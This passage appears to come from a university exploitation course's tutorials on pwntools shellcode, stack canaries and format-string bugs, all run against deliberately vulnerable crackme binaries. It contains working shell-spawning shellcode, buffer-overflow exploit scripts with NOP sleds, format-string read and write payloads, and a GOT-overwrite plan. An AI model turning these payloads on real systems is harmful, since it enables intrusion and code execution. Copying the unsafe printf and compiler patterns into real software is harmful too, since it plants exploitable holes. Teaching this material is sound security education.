esp ebp V V ... [ buf ] [bp] [ra] ... [shellcode ...] |<- 0x10 ->| | ^ | | +-------+
pwntools also provides numerous ready-to-use shellcode templates as well!
$ shellcraft -l ... i386.android.connect i386.linux.sh ... $ shellcraft -f a i386.linux.sh /* execve(path='/bin///sh', argv=['sh'], envp=0) */ /* push '/bin///sh\x00' */ push 0x68 push 0x732f2f2f push 0x6e69622f mov ebx, esp /* push argument array ['sh\x00'] */ /* push 'sh\x00\x00' */ push 0x1010101 xor dword ptr [esp], 0x1016972 xor ecx, ecx push ecx /* null terminate */ push 4 pop ecx add ecx, esp push ecx /* 'sh\x00' */ mov ecx, esp xor edx, edx /* call execve() */ push SYS_execve /* 0xb */ pop eax int 0x80
shellcraft can do more than just provide shellcode source code: it also lets you test the shellcode, either by itself (-r) or in GDB (-d). Please check shellcraft --help for more.
-r
-d
shellcraft --help
# debugging the shellcode $ shellcraft -d i386.linux.sh # running the shellcode $ shellcraft -r i386.linux.sh
You can also use shellcraft in your Python code (below, exploit2.py):
exploit2.py
#!/usr/bin/env python3 from pwn import * context.update(arch='i386', os='linux') shellcode = shellcraft.sh() print(shellcode) print(hexdump(asm(shellcode))) payload = cyclic(cyclic_find(0x61616167)) payload += p32(0xdeadbeef) payload += asm(shellcode) p = process('./crackme0x00') p.sendline(payload) p.interactive()
asm() compiles your shellcode and returns it as a Python bytes.
asm()
bytes
[Task] Where should it jump (i.e., where is the shellcode located)? Change 0xdeadbeef to the shellcode's address. Does it work? In fact, it shouldn't, but how can you debug/understand this situation?
[Task] Where should it jump (i.e., where is the shellcode located)? Change 0xdeadbeef to the shellcode's address.
Does it work? In fact, it shouldn't, but how can you debug/understand this situation?
Evem more conveniently, we can use pwntools to put together pre-made pieces of shellcode in Python, and test it with run_assembly(). The below code, like the shellcode from lab02, reads a flag and dumps it to the screen:
run_assembly()
#!/usr/bin/env python3 from pwn import * context.update(arch='x86_64', os='linux') sh = shellcraft.open('/proc/flag') sh += shellcraft.read(3, 'rsp', 0x1000) sh += shellcraft.write(1, 'rsp', 'rax') sh += shellcraft.exit(0) p = run_assembly(sh) print(p.read())
The pwntools GDB module provides a convenient way to create your debugging script.
To display debugging information, you need to use a terminal that can split your shell into multiple screens. pwntools supports tmux (tmux cheat sheet), which you should run prior to using the GDB module:
tmux
$ tmux $ ./exploit3.py
Note: For pwntools's GDB module to run properly, you must run tmux prior to running the script.
You can invoke GDB as part of your Python code (below, exploit3.py).
exploit3.py
#!/usr/bin/env python3 from pwn import * context.update(arch='i386', os='linux') print(shellcraft.sh()) print(hexdump(asm(shellcraft.sh()))) shellcode = shellcraft.sh() payload = cyclic(cyclic_find(0x61616167)) payload += p32(0xdeadbeef) payload += asm(shellcode) p = process('./crackme0x00') gdb.attach(p, ''' echo "hi" # break *0xdeadbeef continue ''') p.sendline(payload) p.interactive()
Replace 0xdeadbeef with the address of the shellcode.
0xdeadbeef
Note: Because of the security policy enforced by the Linux kernel, gdb.attach() and gdb.debug() don't work with the original setuid binaries under /home/lab03/. You need to first copy the binaries to your tmp directory in order to attach them to GDB.
gdb.attach()
gdb.debug()
setuid
/home/lab03/
tmp
The only difference from before is that process() is now attached to GDB with gdb.attach(). The second argument to that function is, as you can guess, the GDB script that you'd like to execute (e.g., setting breakpoints).
process()
[Task] Does the exploit get stuck, something like this? (It may appear different in your environment.) 0xffffd6b0 add ecx, esp 0xffffd6b2 push ecx 0xffffd6b3 mov ecx, esp 0xffffd6b5 xor edx, edx 0xffffd6b7 push 0 ->0xffffd6b9 sar bl, 1 0xffffd6bb test dword ptr [eax], 0 The shellcode has not been injected properly. Can you spot the differences between the shellcode below (shellcraft -f a i386.linux.sh) and what was apparently injected (above)? Where does it seem to be getting stuck? ... mov ecx, esp xor edx, edx /* call execve() */ push SYS_execve /* 0xb */ pop eax int 0x80
[Task] Does the exploit get stuck, something like this? (It may appear different in your environment.)
0xffffd6b0 add ecx, esp 0xffffd6b2 push ecx 0xffffd6b3 mov ecx, esp 0xffffd6b5 xor edx, edx 0xffffd6b7 push 0 ->0xffffd6b9 sar bl, 1 0xffffd6bb test dword ptr [eax], 0
The shellcode has not been injected properly. Can you spot the differences between the shellcode below (shellcraft -f a i386.linux.sh) and what was apparently injected (above)? Where does it seem to be getting stuck?
shellcraft -f a i386.linux.sh
... mov ecx, esp xor edx, edx /* call execve() */ push SYS_execve /* 0xb */ pop eax int 0x80
The gdb.attach() and gdb.debug() functions will come in handy when you want to start debugging from within your Python scripts. These two methods are similar, but have one notable difference:
gdb.debug() starts a new process under the debugger, as if you're running GDB outside of your exploit script:
target = './crackme0x00' # (this is a copied binary under /tmp) p = gdb.debug(target, gdbscript=''' init-pwndbg break main ''') p.interactive()
gdb.attach() attaches GDB to a process that's already running. Therefore, you need to start the process before invoking gdb.attach(), and pass the process object as an argument:
target = './crackme0x00' # (this is a copied binary under /tmp) p = process(target) # first, start the target process gdb.attach(p, gdbscript=''' init-pwndbg break main ''') p.interactive()
$ man scanf
scanf() accepts all non-whitespace chars (including NULL!), but the default shellcode from pwntools contains a whitespace char (0xb), which caused the end of our shellcode to be chopped off.
NULL
Here are the characters that scanf() considers whitespace:
If you're curious to explore this more, check out the scanf sub-directory in tut03-pwntool:
tut03-pwntool
$ cd scanf $ make ...
[Task] Can you change your shellcode to avoid using these chars? pwntools actually supports this feature (look for --avoid in shellcraft --help), but it's unfortunately broken as of when I write this, so you'll have to adjust the shellcode manually for now. Please use exploit4.py (locally). Did you manage to get a (local) flag?
[Task] Can you change your shellcode to avoid using these chars?
pwntools actually supports this feature (look for --avoid in shellcraft --help), but it's unfortunately broken as of when I write this, so you'll have to adjust the shellcode manually for now.
--avoid
Please use exploit4.py (locally). Did you manage to get a (local) flag?
exploit4.py
Tip: Still having problems? Check if the address you're jumping to contains any of scanf()'s illegal bytes. If it does, you can get a more favorable target address by adding an environment variable, which will result in all stack addresses being shifted downward. Or, read the next section to learn about nop sleds, which allow for some flexibility in the address value (for example, you could use 0xAAAAAA21 instead of 0xAAAAAA20)!
0xAAAAAA21
0xAAAAAA20
Your current exploit looks like this (from exploit4.py):
... payload = cyclic(cyclic_find(0x61616167)) payload += p32([addr-to-local-stack]) payload += asm(shellcode) p = process('./crackme0x00') p.sendline(payload)
To run your exploit on the lab server, you can of course copy this script there (scp) and run it, but it's also possible to run the script locally and have it connect to our server, like this:
scp
# connect to our server s = ssh('lab03', '<ctf-server-address>', password='<lab03-password>') # invoke a process on the server p = s.process('./crackme0x00', cwd='/home/lab03/tut03-pwntool') p.sendline(payload) ...
Does your exploit work on the server? ...Probably not. But that's just because stack addresses in your local environment are different from those on the server.
| | | ret | | | a | ret | | shellcode | | | fixed => | shellcode | => | | => | ret | address | | | | | shellcode | | ... | | ... | | ... | | ENV | | ENV | | ENV | 0xffffe000 | ... | | ... | | ... | (local) (server) or (server)
There are a few factors that affect the state of the server's stack. As discussed in the last tutorial, a primary one is environment variables, which are located near the bottom of the stack, as shown above.
One way to increase the chances of executing the shellcode is to add a "nop sled" to the beginning, like this:
payload += p32([addr-to-local-stack]) payload += b'\x90' * 100 payload += asm(shellcode)
If you happen to jump anywhere into the nop sled, execution will harmlessly "slide" through it, and ultimately reach and execute the actual shellcode:
| | | ret | a | nop | fixed => | nop | address | nop | | ... | | shellcode | | ... | | ENV | 0xffffe000 | ... |
The longer the nop sled, the more likely it is that you can manage to jump into it. So why not make a huge nop sled, say 0x10000 bytes long? Unfortunately, stack space is limited (try vmmap in gdb-pwndbg), so if your input is too long, it'll reach the end of the stack (i.e., 0xffffe000).
0x8048000 0x8049000 r-xp 1000 0 /tmp/crackme0x00 0x8049000 0x804a000 r-xp 1000 0 /tmp/crackme0x00 0x804a000 0x804b000 rwxp 1000 1000 /tmp/crackme0x00 ... 0xfffdd000 0xffffe000 rwxp 21000 0 [stack]
Is there a way to avoid this issue? One way is to add more environment variables, in order to enlarge the stack region:
p = s.process('./crackme0x00', cwd='/home/lab03/tut03-pwntool', env={b'DUMMY': b'A'*0x1000})
[Task] Did you finally manage to execute the shellcode and get the flag? Please submit the flag and claim the points!
pwntools has many more features than those introduced in this tutorial. Please check the documentation if you'd like to learn more.
In this tutorial, we'll explore a defense mechanism against stack overflows; namely, the stack canary. Although it's the most primitive form of defense, it's powerful and performant, which is why it's very popular in most, if not all, binaries you can find in modern systems. This lab's challenges showcase a variety of stack canary designs, and highlight their subtle pros and cons in various target applications.
This is the original source code of the crackme0x00 challenge that we're quite familiar with by now:
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> int main(int argc, char *argv[]) { setreuid(geteuid(), geteuid()); char buf[16]; printf("IOLI Crackme Level 0x00\n"); printf("Password:"); scanf("%s", buf); if (!strcmp(buf, "250382")) printf("Password OK :)\n"); else printf("Invalid Password!\n"); return 0; }
We're going to compile this source code into four different binaries, with different options:
$ make cc -m32 -g -O0 -mpreferred-stack-boundary=2 -no-pie -fno-stack-protector -z execstack -o crackme0x00-nossp-exec crackme0x00.c checksec --file crackme0x00-nossp-exec [*] '/tmp/.../tut04-ssp/crackme0x00-nossp-exec' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments cc -m32 -g -O0 -mpreferred-stack-boundary=2 -no-pie -fno-stack-protector -o crackme0x00-nossp-noexec crackme0x00.c checksec --file crackme0x00-nossp-noexec [*] '/tmp/.../tut04-ssp/crackme0x00-nossp-noexec' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) cc -m32 -g -O0 -mpreferred-stack-boundary=2 -no-pie -fstack-protector -o crackme0x00-ssp-exec -z execstack crackme0x00.c checksec --file crackme0x00-ssp-exec [*] '/tmp/.../tut04-ssp/crackme0x00-ssp-exec' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments cc -m32 -g -O0 -mpreferred-stack-boundary=2 -no-pie -fstack-protector -o crackme0x00-ssp-noexec crackme0x00.c checksec --file crackme0x00-ssp-noexec [*] '/tmp/.../tut04-ssp/crackme0x00-ssp-noexec' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000)
Our goal is to test the effects of two interesting compilation options:
-fno-stack-protector
-z execstack
We name the four binaries using the following convention:
crackme0x00-{ssp|nossp}-{exec|noexec}
crackme0x00-nossp-exec behaves exactly the same as the original crackme0x00. Unsurprisingly, it crashes on a long input:
crackme0x00-nossp-exec
$ echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | ./crackme0x00-nossp-exec IOLI Crackme Level 0x00 Password:Invalid Password! Segmentation fault
What about crackme0x00-ssp-exec, compiled with a stack protector?
crackme0x00-ssp-exec
$ echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | ./crackme0x00-ssp-exec IOLI Crackme Level 0x00 Password:Invalid Password! *** stack smashing detected ***: <unknown> terminated Aborted
The binary detects "stack smashing", and simply terminates itself to prevent possible exploitation, resulting in a crash instead of being hijacked.
You might want to run GDB to figure out what's going on in this binary:
$ gdb ./crackme0x00-ssp-noexec Reading symbols from ./crackme0x00-ssp-noexec...done. (gdb) r Starting program: crackme0x00-ssp-noexec IOLI Crackme Level 0x00 Password:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Invalid Password! *** stack smashing detected ***: <unknown> terminated Program received signal SIGABRT, Aborted. 0xf7fd5079 in __kernel_vsyscall () (gdb) bt #0 0xf7fd5079 in __kernel_vsyscall () #1 0xf7e14832 in __libc_signal_restore_set (set=0xffffd1d4) at ../sysdeps/unix/sysv/linux/nptl-signals.h:80 #2 __GI_raise (sig=6) at ../sysdeps/unix/sysv/linux/raise.c:48 #3 0xf7e15cc1 in __GI_abort () at abort.c:79 #4 0xf7e56bd3 in __libc_message (action=do_abort, fmt=<optimized out>) at ../sysdeps/posix/libc_fatal.c:181 #5 0xf7ef0bca in __GI___fortify_fail_abort (need_backtrace=false, msg=0xf7f677fa "stack smashing detected") at fortify_fail.c:33 #6 0xf7ef0b7b in __stack_chk_fail () at stack_chk_fail.c:29 #7 0x080486e4 in __stack_chk_fail_local () #8 0x0804864e in main (argc=97, argv=0xffffd684) at crackme0x00.c:21
To figure out how two binaries are different, we've kindly provided you a script, "diff.sh", that can help you compare the disassemblies of two binaries.
diff.sh
$ ./diff.sh crackme0x00-nossp-noexec crackme0x00-ssp-noexec --- /dev/fd/63 2019-09-16 16:31:16.066674521 -0500 +++ /dev/fd/62 2019-09-16 16:31:16.066674521 -0500 @@ -3,38 +3,46 @@ mov ebp,esp push esi push ebx - sub esp,0x10 - call 0x8048480 <__x86.get_pc_thunk.bx> - add ebx,0x1aad - call 0x80483d0 <geteuid@plt> + sub esp,0x18 + call 0x80484d0 <__x86.get_pc_thunk.bx> + add ebx,0x1a5d + mov eax,DWORD PTR [ebp+0xc] + mov DWORD PTR [ebp-0x20],eax + mov eax,gs:0x14 + mov DWORD PTR [ebp-0xc],eax + xor eax,eax + call 0x8048420 <geteuid@plt> mov esi,eax ... add esp,0x4 mov eax,0x0 + mov edx,DWORD PTR [ebp-0xc] + xor edx,DWORD PTR gs:0x14 + call 0x80486d0 <__stack_chk_fail_local> pop ebx pop esi pop ebp
Some of the function addresses have changed due to main() growing longer; those differences can be ignored. The two notable differences are in main()'s prologue and epilogue. First, in the prologue, there's an extra value (gs:0x14) placed after the frame pointer on the stack:
gs:0x14
+ mov eax,gs:0x14 + mov DWORD PTR [ebp-0xc],eax + xor eax,eax
And the epilogue later validates that the inserted value is the same, right before returning to the caller:
+ mov edx,DWORD PTR [ebp-0xc] + xor edx,DWORD PTR gs:0x14 + call 0x7c0 <__stack_chk_fail_local>
__stack_chk_fail_local() is the function you observed in GDB's backtrace.
__stack_chk_fail_local()
As a result of __stack_chk_fail_local(), the process simply halts (via abort()), as you can see in this code from the glibc library:
abort()
void __attribute__ ((noreturn)) __fortify_fail (const char *msg) { /* The loop is added only to keep gcc happy. */ while (1) __libc_message (do_abort, "*** %s ***: terminated\n", msg); } void __attribute__ ((noreturn)) __stack_chk_fail (void) { __fortify_fail ("stack smashing detected"); }
This extra value is called a "canary" (a bird? why?). What is its value, precisely?
$ gdb ./crackme0x00-ssp-exec (gdb) br *0x0804863d (gdb) r ... (gdb) x/1i $eip => 0x0804863d <main+167>: mov edx,DWORD PTR [ebp-0xc] (gdb) si (gdb) info r edx edx 0xcddc8000 -841187328 (gdb) r ... (gdb) x/1i $eip => 0x0804863d <main+167>: mov edx,DWORD PTR [ebp-0xc] (gdb) si (gdb) info r edx edx 0xe4b8800 239831040
Have you noticed that the canary value keeps changing with every execution? This is great, because it means that attackers would need to truly guess (or bypass) the canary value before launching an exploit.
pwndbg also provides a way to look up a process's canary value, with the "canary" command:
pwndbg
canary
... (gdb) canary AT_RANDOM = 0xffffcffb # points to (not masked) global canary value Canary = 0x724bdc00 Found valid canaries on the stacks: 00:0000| 0xffffcd8c <- 0x724bdc00
You might also be wondering what exactly the gs register is, and the immediate offset like gs:0x14. The gs register is one of the "segment registers" that contain, by the ABI specification, a base address for thread local storage (TLS). TLS contains thread-specific information, such as errno (the most recent error number). The immediate value (e.g., 0x14) simply represents the offset from the TLS base address -- in our case, the offset to the canary value.
gs
errno
Below is an actual definition of the TLS information in glibc. stack_guard contains the canary value. We will later check the other guard, pointer_guard, for hijacking other function pointers in glibc (e.g., atexit).
stack_guard
pointer_guard
atexit
// @glibc/sysdeps/i386/nptl/tls.h typedef struct { void *tcb; /* Pointer to the TCB. Not necessarily the thread descriptor used by libpthread. */ dtv_t *dtv; void *self; /* Pointer to the thread descriptor. */ int multiple_threads; uintptr_t sysinfo; uintptr_t stack_guard; uintptr_t pointer_guard; int gscope_flag; /* Bit 0: X86_FEATURE_1_IBT. Bit 1: X86_FEATURE_1_SHSTK. */ unsigned int feature_1; /* Reservation of some values for the TM ABI. */ void *__private_tm[3]; /* GCC split stack support. */ void *__private_ss; /* The lowest address of shadow stack, */ unsigned long ssp_base; } tcbhead_t;
pwndbg provides a way to look up the base address of gs (in i386) and fs (in x86_64), with the gsbase and fsbase commands.
fs
gsbase
fsbase
What if the stack canary implementation wasn't "perfect"; that is, an attacker could perhaps guess it (i.e., guess gs:0x14)?
Let's check out this week's tutorial challenge binary:
$ objdump -M intel -d ./target-ssp ...
What if, instead of this like before...
mov eax,gs:0x14 mov DWORD PTR [ebp-0xc],eax xor eax,eax
...there was now this?
mov DWORD PTR [ebp-0xc],0xdeadbeef
This implementation uses a known value (0xdeadbeef) as its stack canary.
Recall that the stack has this layout:
esp ebp V V ... [ buf ] [canary] [(unused)] [bp] [ra] ... |<- 0x10 ->| |<-------------- 0x20 -------------->|
[Task] How could we exploit this program (otherwise the same as last week's tutorial)? Try it out and get this week's tutorial flag!
In this tutorial, we'll explore a powerful new class of bug, called a "format string vulnerability". Though it looks benign at first, this type of bug allows for arbitrary reads and writes in memory, and thus, arbitrary code execution.
We've finally eliminated the buffer overflow vulnerability in the crackme0x00 binary. Let's check out the new implementation!
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <err.h> #include "flag.h" unsigned int secret = 0xdeadbeef; void handle_failure(char *buf) { char msg[100]; snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf); printf(msg); } int main(int argc, char *argv[]) { setreuid(geteuid(), geteuid()); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stdin, NULL, _IONBF, 0); int tmp = secret; char buf[100]; printf("IOLI Crackme Level 0x00\n"); printf("Password:"); fgets(buf, sizeof(buf), stdin); if (!strcmp(buf, "250382\n")) { printf("Password OK :)\n"); } else { handle_failure(buf); } if (tmp != secret) { puts("The secret is modified!\n"); } return 0; }
$ checksec --file crackme0x00 [*] '/home/lab05/tut05-fmtstr/crackme0x00' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000)
As you can see, it's a fully protected binary.
NOTE. These two lines immediately flush your input and output buffers. They're just there to make your life easier. setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stdin, NULL, _IONBF, 0);
NOTE. These two lines immediately flush your input and output buffers. They're just there to make your life easier.
setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stdin, NULL, _IONBF, 0);
It works similarly to before, but when we type an incorrect password, it now produces an error message like this:
$ ./crackme0x00 IOLI Crackme Level 0x00 Password:asdf Invalid Password! asdf
Unfortunately, this program is using printf() in a very insecure way.
printf()
snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf); printf(msg);
Notice that after the first line above, msg will contain your input (the invalid password). If that input happens to contain a format specifier (%), the printf() in the second line will interpret it. This creates a security issue.
msg
%
Some common format specifiers are:
%p
%s
%d
%x
Let's try typing %p:
$ ./crackme0x00 IOLI Crackme Level 0x00 Password:%p Invalid Password! 0x64
What's 0x64 in base-10? What do you think this represents in the code?
0x64
Let's go crazy by putting more %ps. How about 15?
$ echo "1=%p|2=%p|3=%p|4=%p|5=%p|6=%p|7=%p|8=%p|9=%p|10=%p|11=%p|12=%p|13=%p|14=%p|15=%p" | ./crackme0x00 Password:Invalid Password! 1=0x64|2=0x8048a40|3=0xffe1f428 ...
We seem to be able to see the values for 15 (or more -- we chose 15 arbitrarily) nonexistent arguments to the printf() call.
1=0x64 2=0x8048a40 3=0xffe1f428 4=0xf7f3ce89 ... 10=0x61766e49 11=0x2064696c 12=0x73736150 13=0x64726f77 14=0x3d312021 15=0x327c7025
Where are those values coming from?
By the way, it's rather tedious to put lots of %ps to see these values. Luckily, printf-like functions provide a convenient way to access the n'th argument: %[nth]$p (e.g., %1$p = first argument). Let's try it:
printf
%[nth]$p
%1$p
$ echo '%10$p' | ./crackme0x00 IOLI Crackme Level 0x00 Password:Invalid Password! 0x61766e49
As expected, the value printed matches the tenth one listed above.
NOTE: Be sure to use single quotes (') rather than double quotes ("), to prevent your shell from trying to interpret the $ itself (e.g., like $PATH). If you do later need a format-string argument that includes interpolation, use " and backslash-escape the format-specifier $s (i.e., "\$").
'
"
$
$PATH
\$
Let's exploit this format-string bug to write an arbitrary value to an arbitrary memory address.
Have you noticed these interesting values in the output earlier?
4=0xf7f3ce89 ... 10=0x61766e49 'Inva' 11=0x2064696c 'lid ' 12=0x73736150 'Pass' 13=0x64726f77 'word' 14=0x3d312021 '! 1=' 15=0x327c7025 '%p|2'
We can actually see our input string itself. We know that that string is stored on the stack, so it seems that what we put onto the stack is actually being interpreted as additional printf() arguments. What's going on?
When you invoke a printf()-like function, your arguments are passed via the stack, like this:
printf("%s", a1, a2); [ ra ] [ s ] --+ < 1st printf() argument: pointer to the format string [ a1 ] | < 2nd printf() argument: a1, the 1st format-string argument (aka %1$s) [ a2 ] | < 3rd printf() argument: a2, the 2nd format-string argument (aka %2$s) ["%s"] <-+ < the actual string data itself, on the stack [ ...]
Only three arguments are passed to printf() here, but printf() itself has no way of knowing that. So if the format string calls for higher-numbered arguments, printf() will faithfully read more data from the stack, since that's where those arguments would be if they did exist.
In this simple case, the third "argument" (i.e. %3$s) happens to be the format string data itself, so we have full control over its value! You can take advantage of this to read a few bytes from an arbitrary memory address, like this:
%3$s
printf("\xaa\xaa\xaa\xaa%3$s", a1, a2); [ ra ] [ s ] --+ [ a1 ] | [ a2 ] | +-- [aaaa] <-+ | [ ...] | V ?
This reads and prints a string (%s) at an address indicated by "the third argument," which we've set up to contain address 0xaaaaaaaa. By modifying the value of that address, we can make printf() read a string from anywhere.
In the case of the actual target binary, where is your input string located on the stack? That is, what value of N below results in this output?:
target
N
$ echo 'BBAAAA%N$p' | ./crackme0x00 IOLI Crackme Level 0x00 Password:Invalid Password! BBAAAA0x41414141
What happens if we then replace %p with %s? How does it crash?
You can examine the stack to understand how the format string bug works. As you can see, there are pointers to your input string AABBBB in the 3rd and 7th entries of the stack, and a copy of the value BBBB itself exists in the 15th entry.
AABBBB
BBBB
pwndbg> x/100i handle_failure 0x804880b <handle_failure>: push ebp 0x804880c <handle_failure+1>: mov ebp,esp 0x804880e <handle_failure+3>: sub esp,0x88 ... 0x8048841 <handle_failure+54>: push eax 0x8048842 <handle_failure+55>: call 0x8048520 <printf@plt> pwndbg> b *0x8048842 Breakpoint 1 at 0x8048842: file crackme0x00.c, line 14. pwndbg> r Starting program: /home/lab05/tut05-fmtstr/crackme0x00 AAAABBBBCCCC IOLI Crackme Level 0x00 Password:AABBBB pwndbg> stack 30 00:0000| esp 0xffd86b50 -> 0xffd86b78 <- 0x61766e49 ('Inva') 01:0004| 0xffd86b54 <- 0x64 /* 'd' */ 02:0008| 0xffd86b58 -> 0x8048a40 <- dec ecx 03:000c| 0xffd86b5c -> 0xffd86c18 <- 'AABBBB\n' 04:0010| 0xffd86b60 -> 0xf7f0eeb9 05:0014| 0xffd86b64 <- 0x1 06:0018| 0xffd86b68 <- 0x0 07:001c| 0xffd86b6c -> 0xffd86c18 <- 'AABBBB\n' 08:0020| 0xffd86b70 -> 0x804a00c (_GLOBAL_OFFSET_TABLE_+12) 09:0024| 0xffd86b74 -> 0xf7f14028 (_dl_fixup+184) 0a:0028| eax 0xffd86b78 <- 0x61766e49 ('Inva') 0b:002c| 0xffd86b7c <- 0x2064696c ('lid ') 0c:0030| 0xffd86b80 <- 0x73736150 ('Pass') 0d:0034| 0xffd86b84 <- 'word! AABBBB\n\n' 0e:0038| 0xffd86b88 <- '! AABBBB\n\n' => 0f:003c| 0xffd86b8c <- 'BBBB\n\n'
You can check this yourself, too. If you try to print the 3rd or 7th argument as a string, it inserts a copy of your input:
lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00 IOLI Crackme Level 0x00 Password:AABBBB%3$s Invalid Password! AABBBBAABBBB%3$s lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00 IOLI Crackme Level 0x00 Password:AABBBB%7$s Invalid Password! AABBBBAABBBB%7$s
But attempting to dereference the 15th stack entry causes a segmentation fault because that value is not a pointer, but rather the raw string "BBBB":
lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00 IOLI Crackme Level 0x00 Password:AABBBB%15$s Segmentation fault (core dumped)
What happens if you replace the "BBBB" with a valid address and try that again?
[Task] How can you use this to read the global variable "secret"? You can find the address of secret using nm (or GDB or Ghidra): $ nm crackme0x00 | grep secret 0804a050 D secret
[Task] How can you use this to read the global variable "secret"?
secret
You can find the address of secret using nm (or GDB or Ghidra):
nm
$ nm crackme0x00 | grep secret 0804a050 D secret
printf() is very complex, and actually even supports a sort of "write" operation: it can write the total number of bytes printed so far to a specified location.
%n
int len; printf("aaaa%nbbbb", &len); // `len` now contains 4, because 4 bytes had been printed so far at that point
Using this, and a similar trick to the arbitrary read, you can write to an arbitrary memory location like this:
printf("\xaa\xaa\xaa\xaa%3$n", a1, a2); [ ra ] [ s ] --+ [ a1 ] | [ a2 ] | +-- [aaaa] <-+ | [ ...] | V ... *0xaaaaaaaa = 4 (i.e., 4 "\xaa"s have been printed so far)
With this idea, we clearly have full control over the address, but so far it seems we can only write the number "4" there. How can we write an arbitrary value?
To do that, we need to use another useful printf() format specifier: %[len]d (e.g., %10d). This prints an integer (we don't care which one) using at minimum len characters. This can be used to quickly raise the value that %n will write, without requiring an excessively long format string.
%[len]d
%10d
len
For example, to write 10 to 0xaaaaaaaa, you can print 6 more characters, like this:
0xaaaaaaaa
printf("\xaa\xaa\xaa\xaa%6d%3$n", a1, a2); ^^^ *0xaaaaaaaa = 10;
And now you can write an arbitrary value to an arbitrary location. Almost.
Let's suppose you want to write the value 0xc0ffee to 0xaaaaaaaa. We'd prefer to avoid having to generate 12648430 bytes of output, so it'd be better to write this value byte-by-byte instead, which would involve far smaller numbers. You might think to do that with these operations:
0xc0ffee
*(int *)0xaaaaaaaa = 0x000000ee; *(int *)0xaaaaaaab = 0x000000ff; *(int *)0xaaaaaaac = 0x000000c0;
But the problem is that once characters have been printed, they can't be "un-printed", so the values that we write must strictly increase over time. So the writes would need to be done in this order:
*(int *)0xaaaaaaac = 0x000000c0; *(int *)0xaaaaaaaa = 0x000000ee; *(int *)0xaaaaaaab = 0x000000ff;
But when you write the 4-byte integer 0x000000ee to 0xaaaaaaaa, you overwrite the byte 0xc0 at 0xaaaaaaac with a null byte. So that won't work.
0x000000ee
0xc0
0xaaaaaaac
There is a solution! There exist smaller-sized versions of %n:
%hn
%hhn
That is, you can do this:
printf("\xaa\xaa\xaa\xaa%6d%3$hhn", a1, a2); *(unsigned char*)0xaaaaaaaa = 10;
This solves two problems at the same time:
0xff
0xc1
0x1c0
*(unsigned char*)0xaaaaaaaa = 0xee; *(unsigned char*)0xaaaaaaab = 0xff; *(unsigned char*)0xaaaaaaac = 0xc0; // lowest 8 bits of 0x1c0
[Task] Can you overwrite the secret value with 0xc0ffee?
It's important to understand the core idea of how to construct a format string that writes an arbitrary value to an arbitrary location, but when you try to actually implement one, you'll quickly find that it's very tedious to do manually. Fortunately, pwntools provides a format string exploit generator for you.
fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') offset (int): the first formatter's offset you control writes (dict): dict with addr, value {addr: value, addr2: value2} numbwritten (int): the number of bytes already written by printf()
fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
int
dict
{addr: value, addr2: value2}
Let's say we'd like to write 0xc0ffee to *0xaaaaaaaa, and we have control of the format string at the 4th param (i.e., %4$p), but we've already printed out 10 characters.
*0xaaaaaaaa
%4$p
$ python3 -c 'from pwn import*; print(fmtstr_payload(4, {0xaaaaaaaa: 0xc0ffee}, 10))' %228c%13$n%17c%14$hhn%193c%15$hhnaaa\xaa\xaa\xaa\xaa\xab\xaa\xaa\xaa\xac\xaa\xaa\xaa
[Task] Is this similar to what you've come up with to write 0xc0ffee to the secret value? Please modify template.py to overwrite the secret value (if you succeed, the binary will print "The secret is modified!")!
The secret is modified!
Your task for today is to launch a control-hijacking attack using this format string vulnerability. The plan is simple: overwrite the GOT of puts() with the address of print_key(), so that when puts() is invoked, execution is actually redirected to print_key().
puts()
print_key()
Here's an explanation of the GOT in case you haven't heard of it. The Global Offset Table ("GOT" for short) is a table in the process's memory which contains pointers to external functions (e.g., puts() or printf() in libc). Each entry corresponds to one function the compiler expects the binary to use.
When a dynamic loader such as ld initially loads the program, the GOT is (roughly speaking -- the actual behavior will be demonstrated shortly) filled with pointers to "_dl_runtime_resolve()":
ld
_dl_runtime_resolve()
[&_dl_runtime_resolve] <- entry for printf() [&_dl_runtime_resolve] <- entry for puts() [&_dl_runtime_resolve] <- entry for scanf() [&_dl_runtime_resolve] <- entry for exit() ...
The first time the process attempts to call an external function through this table, _dl_runtime_resolve() is invoked. It obtains the real address of the desired function (i.e., the real address of puts() in libc), updates the table, and calls the function.
[&_dl_runtime_resolve] <- entry for printf() [&puts] <- entry for puts() [&_dl_runtime_resolve] <- entry for scanf() [&_dl_runtime_resolve] <- entry for exit() ...
After that, any further calls to the same external function (e.g., puts()) will therefore be immediately directed to the real address.
Let's see this in action. Here's the code snippet in main() that calls puts("The secret is modified!\n"):
puts("The secret is modified!\n")
0x0804891b <+189>: sub esp,0xc 0x0804891e <+192>: push 0x8048a80 0x08048923 <+197>: call 0x8048590 <puts@plt>
Note that "puts@plt" is not the real "puts()" in libc -- 0x80490a0 is in your code section (try vmmap 0x80490a0). The real puts() from libc is located here:
puts@plt
0x80490a0
vmmap 0x80490a0
> x/4i puts 0xf7db7b40 <puts>: push ebp 0xf7db7b41 <puts+1>: mov ebp,esp 0xf7db7b43 <puts+3>: push edi 0xf7db7b44 <puts+4>: push esi
puts@plt means "puts at the Procedure Linkage Table (PLT)"; it points to one of the entries in the PLT:
puts
